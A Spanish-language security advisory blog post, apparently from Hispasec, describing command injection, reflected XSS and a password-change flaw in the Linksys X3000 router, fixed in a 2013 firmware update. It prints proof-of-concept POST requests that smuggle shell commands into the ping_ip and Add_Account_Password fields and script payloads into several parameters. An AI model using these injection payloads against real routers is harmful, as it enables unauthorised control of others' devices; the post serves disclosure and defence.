martes, 25 de junio de 2013

Múltiples vulnerabilidades en router Linksys X3000

El investigador de seguridad Michael Messner ha descubierto varios fallos de seguridad en el modelo X3000 de router WiFi de la marca Linksys de Cisco. Estas vulnerabilidades permiten la ejecución de código remoto a través de la inyección de comandos en el sistema operativo subyacente, cross-site scripting y posibilidad de cambiar la contraseña sin preguntar por la contraseña actual.

Inyección de comandos
Se aprovecha la falta de validación en el contenido suministrado por el usuario en los campos ping_ip y Add_Account_Password. Las siguientes peticiones POST pueden servir como prueba de concepto:

  • Parámetro ping_ip de la página Diagnostics.asp:

submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&nowait=1&ping_ip=%3b%20ping%20-c%201%20192%2e168%2e1%2e147%20%3b&ping_size=&ping_times=5&traceroute_ip=

  • Parámetro Add_Account_Password de la página User_Properties.asp:

command=device_data&cur_ipaddr=192.168.178.188&next_page=StorageAdminUserAdd1.htm&redirect_timer=1&reboot=0&data1=&next_page=&submit_button=User_Properties&submit_type=create_user&change_action=gozila_cgi&Add_Account_Group_Name=&access_group_name=&delete_groups=&Modify_Account_Name=&Add_Account_Name=pwnd&full_name=pwnd&user_desc=pwnd&Add_Account_Password=`ping%20192%2e168%2e178%2e103`&Add_Account_PasswordConfirm=pwnd&Add_Account_Group=admin

Con estas peticiones conseguimos ejecutar en el sistema el comando ping.

XSS no persistente
También falta de validación en los parámetros ping_ip, sortby y submit_button.

  • Parámetro ping_ip de la página Diagnostics.asp:

submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&nowait=1&ping_ip=1.1.1.1'><script>alert(1)</script>&ping_size=32&ping_times=5&traceroute_ip=

  • Parámetro sortby de la página DHCPTable.asp:

submit_button=DHCPTable&change_action=&submit_type=&small_screen=&ip=&mac=&if_name=&nowait=1&sortby=mac"%3balert(1)//

  • Parámetro submit_button de la página WanMAC.asp:

submit_button=WanMAC'%3balert(1)//&change_action=&submit_type=&action=Apply&wait_time=3&mac_clone_enable=0

Estas vulnerabilidades han sido solucionas en el firmware v1.0.05 build 002 Feb 21,2013

Más información:

Linksys X3000 - Multiple Vulnerabilities
http://www.s3cur1ty.de/m1adv2013-019

Wireless-N ADSL 2+ Modem Router (X3000)
http://support.linksys.com/en-eu/support/linksys/X3000


Fernando Castillo

fcastillo@hispasec.com
Etiquetas: , , ,

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)
Hispasec Sistemas | Copyright ©1998-2017